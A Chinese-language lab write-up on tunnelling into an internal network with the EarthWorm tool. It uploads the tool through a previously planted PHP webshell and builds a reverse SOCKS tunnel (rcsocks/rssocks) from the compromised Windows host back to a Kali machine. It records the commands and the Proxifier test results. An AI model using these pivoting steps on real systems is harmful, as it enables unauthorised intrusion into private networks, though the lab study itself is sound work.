# 打通內網(雙網卡) 範例機:windows2003 and kali-msf 1.我的phpstudy是用系統安裝，所以權限設定可能不同，請多留意  ## 2. 在本機(外網)可通  在本機(內網)不可通  ## 目的讓外網看到內網 # 範例1 : ew 使用ew打通 EW全名為EarthWorm簡稱叫做EW， 它是一套便攜式的網路工具， 具有SOCKS5服務架設和連接埠轉送兩大核心功能， 並且包含著LCX工具的功能，可以再複雜的網路環境實現網路穿透 EW可以已`正向`和`方向`以及多級級聯的方式建立網路隧道 這裡示範簡單的正向以及反向是實現過程 ### 先要架設正反向的連接  使用之前傳進去的123.php一句話木馬，使用工具打開內部資料夾 並上傳ew.exe(後面用來進行反向連接) 在上傳ew_for_linux給kali做正向連接 英文我看不懂所以說用chatgpt翻譯一下 ``` 版本 : free 1.0 ./xxx ([-選項] [值])* 選項 : 例子: ./xxx -s ssocksd -h -s state 設置功能。你可以從以下選項中選擇一個： ssocksd , rcsocks , rssocks , lcx_listen , lcx_tran , lcx_slave -l listenport 開啟一個埠以啟動服務。 -d refhost 設置反射主機地址。 -e refport 設置反射端口。 -f connhost 設置連接主機地址。 -g connport 設置連接端口。 -h help 顯示幫助文本。通過添加 -s 參數， 你還可以看到更詳細的幫助。 -a about 顯示關於頁面。 -v version 顯示版本。 -t usectime 設置超時的毫秒數。默認 值為 1000 ...... ``` 先用linux  發現不能運行，後來發現權限不夠 ``` chmod +x ew_for_linux ``` 給他加執行權限 ``` ./ew_for_linux -s rcsocks -l 1111 -e 3333 ``` 功用 ``` ./ew_for_linux：執行 ew_for_linux 工具。 -s rcsocks：選擇 rcsocks 功能，這個功能通常是用來設置遠程控制的 SOCKS 代理。 -l 1111：指定本地監聽端口為 1111，這意味著工具會在本地端口 1111 上等待傳入的連接。 -e 3333：指定遠程端口為 3333，這意味著工具會將數據轉發到遠程主機上的 3333 端口。 ``` 再到windows端開啟ew ``` ew.exe -s rssocks -d 80.0.0.129 -e 3333 ``` 正常來說`http://80.0.0.129:1111/dz/forum.php`因該要能連接到 但是他顯示亂碼，根據chatgpt所說可能是ew的問題，也可能是網站本來的問題 我error.log找不到問題，所以我推測是ew的問題  想著不要在一棵樹上掉死。我換了port(換成2222跟4444)，但是  還是不行，所以先不管他 用Proxifier連接到本地試試  配置文件->代理服務器->  測試結果 (10.0.0.2)  測試結果 (80.0.0.135(我之後有換過ip但是不影響))